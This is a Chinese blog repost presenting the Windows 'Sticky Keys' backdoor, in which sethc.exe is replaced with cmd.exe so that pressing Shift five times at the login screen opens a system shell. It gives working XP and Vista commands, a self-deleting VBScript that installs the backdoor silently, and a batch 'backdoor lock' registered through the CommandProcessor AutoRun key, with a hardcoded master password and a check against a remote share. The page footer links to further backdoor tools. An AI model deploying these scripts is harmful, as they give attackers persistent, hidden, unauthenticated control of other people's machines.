`
isiqi
  • 浏览: 16483146 次
  • 性别: Icon_minigender_1
  • 来自: 济南
社区版块
存档分类
最新评论

最酷的windows后门 呵呵

阅读更多

后门原理:

转至:小章 blog http://blog.csdn.net/scz123/archive/2007/03/14/1528695.aspx

在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。

参考McafeeAvertLabs:
http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/

XP:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%\system32\dllcache
ren sethc.exe *.ex~
cd %widnir%\system32
copy /y cmd.exe sethc.exe

VISTA:
takeown /f c:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
然后按XP方法替换文件

在登录界面按5此SHIFT,出来cmd shell,然后……

后门扩展:

转至:7j blog http://1v1.name/show-241-1.html#cm300

再更新一下
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)
success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)
success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)
success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)
success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)
success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

第二句最有意思了.嘿嘿..自运应答....以前就遇到过类似的问题

再更新.加个自删除,简化代码...
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

后门锁扩展:

allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证 嘿嘿。。。

用下面的后门锁的方法是 把代码保存为bdlock.bat

然后修改注册表位置即可

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CommandProcessor]
"AutoRun"="bdlock.bat"

@EchoOff
title后门登陆验证
colora
cls
settemprandom=%RANDOM%
echo请输入验证码:%temprandom%
set/pcheck=
if"%check%"=="%temprandom%%temprandom%"gotopasscheck
if"%check%"=="%temprandom%"(
rem后门服务器验证
rem
如果没有后门验证服务器请rem注释掉下一行代码
ifexist\192.168.8.8\backdoor$\passgotopasscheck
)
echo验证失败
pause
exit
:passcheck
echo验证成功
If"%passcmdlock%"=="http://blog.csdn.net/freexploit/"Gotoendx
Setpasscmdlock=http://blog.csdn.net/freexploit/
:allyesno
SetErrorlevel=>nul
Echo请输入验证密码?
Setpassword=allyesnoIsapig>nul
Set/ppassword=
rem万能密码
if"%password%"=="allyesnoisasb"gotoendx
If%time:~1,1%==0Settimechange=a
If%time:~1,1%==1Settimechange=b
If%time:~1,1%==2Settimechange=c
If%time:~1,1%==3Settimechange=d
If%time:~1,1%==4Settimechange=e
If%time:~1,1%==5Settimechange=f
If%time:~1,1%==6Settimechange=g
If%time:~1,1%==7Settimechange=h
If%time:~1,1%==8Settimechange=i
If%time:~1,1%==9Settimechange=j
set/asum=%time:~1,1%+%time:~1,1%
Setpassword|findstr"^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul
If"%errorlevel%"=="0"cls&Echo口令正确&GotoEnd
Echo请联系瑞星客服咨询正确密码!&Gotoallyesno
:End
Setpassword=>nul
SetErrorlevel=>nul
Echo很好,很和谐!
:endx
分享到:
评论

相关推荐

    windows后门程序windows后门程序

    windows后门程序windows后门程序wiwindows后门程序ndows后门程序

    Windows XP后门登录工具

    综上所述,"Windows XP后门登录工具"是一个危险的工具,它展示了如何通过批处理脚本创建后门并绕过系统安全机制。它的存在提醒我们,必须时刻保持系统的安全更新,避免使用未知来源的工具,以防止成为恶意攻击的目标...

    Python-一个隐藏的基于Python的Windows后门

    标题提到的"Python-一个隐藏的基于Python的Windows后门"就是一个典型的例子,展示了Python在创建隐蔽、功能强大的后门程序方面的潜力。 后门程序通常是黑客为了长期控制目标系统而植入的一种隐蔽通道。它们可以绕过...

    windows 登陆 后门(C#源码VS2010)

    windows 登陆 后门(C#源码VS2010) 如何使用: 直接将制作的exe文件改名为:sethc.exe,替换到C:\WINDOWS\system32\,即是粘滞键。 因为避免其他人随便使用后台,需要认证 登陆时的认证:随机抽出1000-5000的素数和...

    内核级后门Rootkit技术

    在Windows操作系统中,内核级后门Rootkit尤其危险,因为它们能够直接影响操作系统的运行机制。 首先,理解Rootkit的工作原理至关重要。Rootkit通常在系统启动时加载到内存中,通过篡改系统调用表或利用内核漏洞来...

    C--课程设计-基于反弹Socket通信的windows系统后门实现.doc

    基于反弹 Socket 通信的 Windows 系统后门实现 本课程设计报告介绍了基于反弹 Socket 通信的 Windows 系统后门实现,主要包括三个子程序:HVNcon.exe、HVNADD.exe 和 HVNdel.exe。该后门程序可以实现服务启动、反弹...

    清凉CMD反向连接后门

    首先,CMD或命令提示符是Windows操作系统中的一个基础工具,用户可以通过它执行各种系统命令。然而,不法分子常常利用CMD来创建恶意程序,因为其功能强大且易于编写。在这个案例中,"清凉CMD反向连接后门"可能是通过...

    Windows服务与后门技术.zip

    Windows服务与后门技术.zip

    C++课程设计-基于反弹Socket通信的windows系统后门实现.doc

    基于反弹Socket通信的Windows系统后门实现 course design report 知识点: 1. 后门程序的概念和作用:后门程序是留在计算机系统中的途径,供特殊使用者通过特殊方式控制计算机系统。基于反弹 Socket 通信的 ...

    Php后门php 后门

    php 后门

    经典反向后门源代码(可用)vc++6.0反弹木马

    利用VC++6.0,开发者可以创建Windows可执行文件,这些文件可能包含反向后门功能。 在压缩包中,我们有两个文件: 1. Proiect_Client.zip:这可能包含客户端部分的源代码,即在被感染的系统上运行的组件。这个部分...

    Windows常见的持久化后门汇总1

    【Windows常见的持久化后门汇总】 在网络安全领域,持久化后门是入侵者用来保持对目标系统长期控制的重要手段。一旦攻击者成功突破系统防御,他们会寻找方法在系统中植入后门,确保即使重启或系统恢复后仍能重新...

    c++课程设计基于反弹socket通信的windows系统后门实现-毕业论文.doc

    基于反弹 Socket 通信的 Windows 系统后门实现知识点总结 本文将基于反弹 Socket 通信的 Windows 系统后门实现的毕业论文的内容,总结出相关的知识点,并对每个知识点进行详细的解释。 1. 后门程序的概念和作用 ...

    端口复用版winshell编写的后门程序源代码

    Wxhshell 最近的练手作品,主要练习C的socket编程, 本后门以服务方式运行,采用端口复用技术, ...服务描述信息:Wrsky Windows CmdShell Service 注册表键名:Wxhshell 默认端口:5000 最大连接数:100

    服务器后门

    在某些版本的Windows系统中,"sethc.exe"是辅助工具快捷键,但有时也被恶意利用,替换为后门程序。"安装后门.exe"很可能是攻击者用来植入后门的程序,而"密码.txt"可能包含了攻击者收集的密码信息或者用于访问服务器...

    DLL后门技术,开发DLL后门的文档

    DLL后门技术利用了DLL文件的特性和Windows操作系统的机制,实现了恶意代码的隐蔽加载和执行。了解DLL后门的工作原理对于提高网络安全意识和防范措施至关重要。通过加强系统监控、定期扫描以及合理的权限管理,可以...

    DLL后门完全清除.txt

    在网络安全领域,DLL(动态链接库)后门是一种常见的攻击手段,它利用Windows系统中DLL文件的加载机制,将恶意代码注入合法程序,从而实现隐蔽性和持久性的入侵。本文将深入探讨DLL后门的工作原理、常见类型及其清除...

    shift后门带下载功能

    "Shift后门"是一种恶意软件,通常被黑客用于非法入侵计算机系统并进行远程控制。它以其独特的触发机制——键盘的Shift键命名,因为这种后门可能在用户按下特定的Shift键组合时激活。以下是关于"Shift后门"及其相关...

    后门程序源码wxhshell

    密码:xuhuanlingzhe 服务名:Wxhshell 服务显示名:Wxhshell Service 服务描述信息:Wrsky Windows CmdShell Service 注册表键名:Wxhshell 默认端口:5000 最大连接数:100

    新的后门——非Shift后门

    【标题】:“新的后门——非Shift后门” 在网络安全领域,后门是一种恶意软件,通常由黑客植入,用于绕过系统的安全措施,提供未经授权的远程访问或控制系统。"非Shift后门"是一个新颖的威胁,它不依赖于常规的...

Global site tag (gtag.js) - Google Analytics